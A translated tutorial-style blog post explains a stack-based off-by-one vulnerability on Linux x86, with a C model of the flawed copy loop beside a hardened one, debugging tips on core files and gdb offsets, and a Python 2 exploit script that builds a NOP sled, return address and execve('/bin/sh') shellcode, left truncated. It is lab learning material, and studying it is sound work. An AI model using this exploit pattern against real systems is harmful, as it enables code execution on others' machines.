Off-by-one Vulnerability (stack based)
Original address: https://bbs.pediy.com/thread-216954.htm
What is off by one?
Copying a source string into a destination buffer can result in an off-by-one when:
1. The source string length is equal to the destination buffer length.
When the source string length equals the destination buffer length, a single null byte is copied just past the end of the destination buffer. Because the destination buffer is located on the stack, that single null byte can overwrite the least significant byte (LSB) of the caller's EBP saved on the stack, which can lead to arbitrary code execution.
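As an added illustration (not code from the original post or from the article it follows), here is a C model of the frame described above: a buffer of an assumed size followed by the saved EBP, with the off-by-one copy loop beside a bounded copy that rejects the equal-length case. It assumes a little-endian x86 layout; BUF_LEN and MODEL_EBP are constructed values.

```c
#include <stdint.h>
#include <string.h>

/* Model of the frame described above: the local buffer sits directly
 * below the caller's saved EBP. Keeping both in one struct means the
 * off-by-one write lands in memory we own (no undefined behaviour).
 * BUF_LEN and MODEL_EBP are constructed values for this example. */
#define BUF_LEN 256
#define MODEL_EBP 0xbffff4d8u

struct frame {
    char buf[BUF_LEN];   /* lowest address */
    uint32_t saved_ebp;  /* immediately above the buffer */
};

/* The bug pattern: `i <= len` copies len+1 bytes, so a source of exactly
 * BUF_LEN characters writes its terminating NUL one byte past buf, i.e.
 * into the least significant byte of saved_ebp on little-endian x86. */
static void copy_off_by_one(struct frame *f, const char *src)
{
    unsigned char *mem = (unsigned char *)f;  /* frame as raw bytes */
    size_t len = strlen(src);
    if (len > BUF_LEN)   /* only len > BUF_LEN is rejected */
        return;
    for (size_t i = 0; i <= len; i++)
        mem[i] = (unsigned char)src[i];
}

/* Hardened copy: the terminator needs its own byte, so equal length is
 * rejected too. Returns 0 on success, -1 when the source does not fit. */
static int copy_bounded(struct frame *f, const char *src)
{
    size_t len = strlen(src);
    if (len >= BUF_LEN)
        return -1;
    memcpy(f->buf, src, len + 1);
    return 0;
}

/* Copy a constructed source of src_len 'A's into a fresh frame and return
 * the saved EBP afterwards; buggy selects which copy routine runs. */
uint32_t saved_ebp_after(int buggy, size_t src_len)
{
    struct frame f = { {0}, MODEL_EBP };
    char src[BUF_LEN + 2] = {0};
    memset(src, 'A', src_len <= BUF_LEN + 1 ? src_len : BUF_LEN + 1);
    if (buggy) copy_off_by_one(&f, src); else copy_bounded(&f, src);
    return f.saved_ebp;
}
```

With a 256-character source the buggy loop clears the low byte of the saved EBP (0xbffff4d8 becomes 0xbffff400), while a 255-character source or the bounded copy leaves it untouched.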
As always, enough definitions; let's take a look at the off-by-one vulnerable code!
I won't paste it here; read the original article for that. I'll only explain my own part.
The original article's explanation is very clear, so I'll only describe the pitfalls I ran into while debugging.
The first is debugging with a core file. The compile command is: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c
Note that the -g option is not used, so the binary has no debug information; without it there is no way to break on source lines in gdb, so you can only debug with the core file.
The author also describes the core-file debugging method, but when I ran python exp.py no core file appeared. After looking it up, I checked with the ulimit -c command and found the value was 0: apparently the system default (?) does not allow core files to be created. I changed the limit with ulimit -c 1000.
After that change, the core file is generated normally.
Another notable pitfall: the address of buf seen while debugging in gdb is not the same as the address of buf when the release build actually runs; the offset changes, which needs special attention.
As usual, I'll share the exp.py file that I debugged successfully.
#exp.py
#!/usr/bin/env python
# Python 2 script (Ubuntu 12.04): str is a byte string and print is a statement.
import struct
from subprocess import call

# Spawn a shell.
# execve(/bin/sh), size 28 bytes. The shellcode string is cut off in the
# original post after "\x89"; the remainder is not reproduced here.
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"

ret_addr = 0xbffff426

# Endianness conversion: pack the address as a little-endian 32-bit unsigned int
def conv(num):
    return struct.pack("<I", num)

# Return address + NOPs + shellcode + trailing filler
buf = "A" * 68
buf += conv(ret_addr)
buf += "\x90" * 30
buf += scode
buf += "A" * 126

print "Calling vulnerable program"
call(["./vuln", buf])
VM setup: Ubuntu 12.04 (x86)
Vulnerability Code:
Linux (x86) exploit series, part three: off-by-one vulnerability (stack based)